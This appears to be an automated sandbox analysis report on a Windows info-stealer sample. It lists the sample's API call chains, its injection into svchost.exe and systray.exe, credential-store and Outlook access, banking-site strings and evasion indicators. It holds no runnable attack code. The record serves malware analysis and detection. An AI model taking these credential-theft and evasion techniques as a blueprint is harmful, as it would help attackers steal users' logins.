Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02381CD0	4_2_02381CD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237CB50	4_2_0237CB50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237CB48	4_2_0237CB48
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237AEB7	4_2_0237AEB7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237AEC0	4_2_0237AEC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237AD70	4_2_0237AD70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237CD70	4_2_0237CD70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_023713A2	4_2_023713A2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02385380	4_2_02385380
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0238357C	4_2_0238357C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02383580	4_2_02383580
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0239BB00	4_2_0239BB00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437E424	4_2_0437E424
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437E7BC	4_2_0437E7BC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437E308	4_2_0437E308
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437D888	4_2_0437D888
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437CB18	4_2_0437CB18

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 0464B970 appears 280 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04695130 appears 58 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 046A7E54 appears 111 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 046DF290 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 046CEA12 appears 86 times

Source: ZmK1CAc4VP.exe, 00000000.00000003.1560358707.00000000044C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZmK1CAc4VP.exe
Source: ZmK1CAc4VP.exe, 00000000.00000003.1561603033.000000000466D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZmK1CAc4VP.exe

Source: ZmK1CAc4VP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/11

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0044AF6C GetLastError,FormatMessageW,

0_2_0044AF6C

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004333BE
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		0_2_00464EAE

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D619

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,

0_2_004755C4

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047839D

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043305F

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

File created: C:\Users\user\AppData\Local\Temp\aut35EE.tmp

Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Command line argument: Wu

0_2_0040D6B0

Source: ZmK1CAc4VP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: systray.exe, 00000004.00000002.4009177930.0000000002968000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1885753141.0000000002911000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1885753141.0000000002968000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4009177930.0000000002932000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1883865487.0000000002947000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1883935366.0000000002932000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1885753141.0000000002932000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZmK1CAc4VP.exe	Virustotal: Detection: 34%
Source: ZmK1CAc4VP.exe	ReversingLabs: Detection: 70%

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

File read: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZmK1CAc4VP.exe "C:\Users\user\Desktop\ZmK1CAc4VP.exe"
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZmK1CAc4VP.exe"
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZmK1CAc4VP.exe"	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1687220730.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687200717.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009508324.000000000093E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1687220730.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687200717.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009508324.000000000093E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ZmK1CAc4VP.exe, 00000000.00000003.1561124881.0000000004540000.00000004.00001000.00020000.00000000.sdmp, ZmK1CAc4VP.exe, 00000000.00000003.1561459837.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594218736.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592417371.0000000003000000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.0000000004620000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1687201236.00000000042CD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1689124934.0000000004472000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.00000000047BE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ZmK1CAc4VP.exe, 00000000.00000003.1561124881.0000000004540000.00000004.00001000.00020000.00000000.sdmp, ZmK1CAc4VP.exe, 00000000.00000003.1561459837.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1687343966.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594218736.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592417371.0000000003000000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.4011091050.0000000004620000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1687201236.00000000042CD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1689124934.0000000004472000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.00000000047BE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: systray.exe, 00000004.00000002.4009177930.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4012982747.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991213233.00000000361FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: systray.exe, 00000004.00000002.4009177930.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4012982747.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991213233.00000000361FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: n4776Jcum1G.exe, 00000003.00000002.4009725651.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp, n4776Jcum1G.exe, 00000006.00000002.4009825612.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: ZmK1CAc4VP.exe

Static PE information: real checksum: 0xa961f should be: 0xf7d51

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00416CB5 push ecx; ret	0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418020 push ebp; iretd	2_2_004180A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004181B5 push esp; ret	2_2_004181C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004034C0 push eax; ret	2_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D4B1 push ebp; retf	2_2_0040D4B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041256C push esp; ret	2_2_00412575
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D5C2 pushad ; iretd	2_2_0040D5C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E70 push ss; retf 43A5h	2_2_00401F97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E70 push es; ret	2_2_00402050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417F6A push ebp; iretd	2_2_004180A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D796 push ebx; retf	2_2_0040D797
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340225F pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034027FA pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340283D push eax; iretd	2_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340135E push eax; iretd	2_2_03401369
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046227FA pushad ; ret	4_2_046227F9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0462225F pushad ; ret	4_2_046227F9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0462283D push eax; iretd	4_2_04622858
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046509AD push ecx; mov dword ptr [esp], ecx	4_2_046509B6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04621328 push eax; iretd	4_2_04621369
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_023941C0 push ss; retn 6A52h	4_2_0239432B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02384AA7 push ebp; iretd	4_2_02384BE4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02384B5D push ebp; iretd	4_2_02384BE4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02384CF2 push esp; ret	4_2_02384D03
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0237F0A9 push esp; ret	4_2_0237F0B2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437A46A push edx; ret	4_2_0437A46D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_043794EC push esi; retf	4_2_043794F3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437F512 push 90CD58C6h; iretd	4_2_0437F534
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437F570 push edx; iretd	4_2_0437F56F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_043745BD push F644805Fh; ret	4_2_043745C7

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_0047A330
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00434418

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	API/Special instruction interceptor: Address: 4343244
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\systray.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 4604			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 5368			Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-87649

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	API coverage: 4.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\systray.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\systray.exe TID: 5932	Thread sleep count: 4604 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5932	Thread sleep time: -9208000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5932	Thread sleep count: 5368 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5932	Thread sleep time: -10736000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe TID: 5476	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe TID: 5476	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe TID: 5476	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe TID: 5476	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe TID: 5476	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0238C5C0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0238C5C0

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Source: Q54E63H5.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: Q54E63H5.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Q54E63H5.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: ZmK1CAc4VP.exe, 00000000.00000002.1571346656.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
Source: Q54E63H5.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Q54E63H5.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
